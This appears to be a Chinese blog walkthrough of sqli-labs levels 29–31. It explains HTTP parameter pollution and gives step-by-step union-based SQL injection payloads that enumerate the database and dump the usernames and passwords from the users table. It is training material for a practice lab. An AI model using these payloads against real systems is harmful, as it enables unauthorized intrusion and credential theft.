当前位置: 首页 > news >正文

sqli_labs第二十九/三十/三十一关——hpp注入

news 2025/5/29 9:41:02

一:HTTP参数污染:

hpp(http parameter pollution)注入中,可以通过在hppt的请求中注入多个同名参数来绕过安全过滤

原理:php默认只取最后一个同名参数 

比如在这一关里,可能对第一个id参数进行消毒处理,但php实际执行的时候使用了第二个没被消毒的id参数

二:判断闭合方式

输入?id=1和?id=1'的时候产生报错

用两个参数进行单引号闭合 ,闭合成功

 三:开始攻击

1.判断列数:

?id=1&id=1' order by 1,2,3,4--+

 三列

2.爆回显位:

?id=1&id=-1' union select 1,2,3--+

3.爆数据库名,版本号

?id=1&id=-1' union select 1,database(),version()--+

4.爆表名,行数

?id=1&id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 5.爆列名:

?id=1&id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

 6.爆数据

?id=1&id=-1' union select 1,group_concat(username,':',password),3 from users--+

ps1:

在查看源码和尝试注入的过程中,发现本关waf的拦截好像并没有起作用,题目存在误导性,用布尔检测和盲注应该也能正常做

ps2:

第三十关把闭合方式改成了双引号 ” ,第三十一关把闭合方式改成了双引号括号 “),其余全部相同 

❀❀❀ 完结撒花!!!❀❀❀ 

http://www.xdnf.cn/news/675343.html

相关文章:

  • 《计算机组成原理》第 6 章 - 计算机的运算方法
  • 大模型的参数高效微调;大模型的对齐
  • Linux显示进程状态——ps命令详解与实战
  • 用C#最小二乘法拟合圆形,计算圆心和半径
  • chrome打不开axure设计的软件产品原型问题解决办法
  • 尚硅谷redis7 41-46 redis持久化之AOF异常恢复演示
  • 从零开始理解机器学习:知识体系 + 核心术语详解
  • 从中控屏看HMI设计的安全与美学博弈
  • FileZillaServer(1) -- 记录
  • Git 克隆别人的远程仓库以后,推到自己的远程仓库
  • BSRN地表基准辐射网数据批量下载
  • SQL基础教程:第一章与第二章内容总结(新手入门指南)
  • 文档注释:删还是不删
  • 关于 smali:3. Smali 与 APK 结构理解
  • LWIP 中,lwip_shutdown 和 lwip_close 区别
  • 深入剖析Java CompletableFuture:原理、陷阱与高并发场景优化指南
  • R语言基础| 可视化初探(ggplot2)
  • 预测式外呼与自动外呼的区别
  • 【博客系统】博客系统第十弹:实现对数据库存储的用户密码进行加密功能、更新登录接口的密码校验功能
  • 【监控】pushgateway中间服务组件
  • openresty+lua+redis把非正常访问的域名加入黑名单
  • threejs顶点UV坐标、纹理贴图
  • SQL Server 和 MySQL 对比
  • 实现单例模式的6种方法(Python)
  • 开源多模态新标杆——BAGEL本地部署教程:7B参数撬动万亿数据
  • 《算法和数据结构》算法篇
  • 车载通信网络 --- OSI模型:网络层
  • SQL 查询慢的常见原因分析
  • 【新品发布】嵌入式人工智能实验箱EDU-AIoT ELF 2正式发布
  • 机器学习-决策树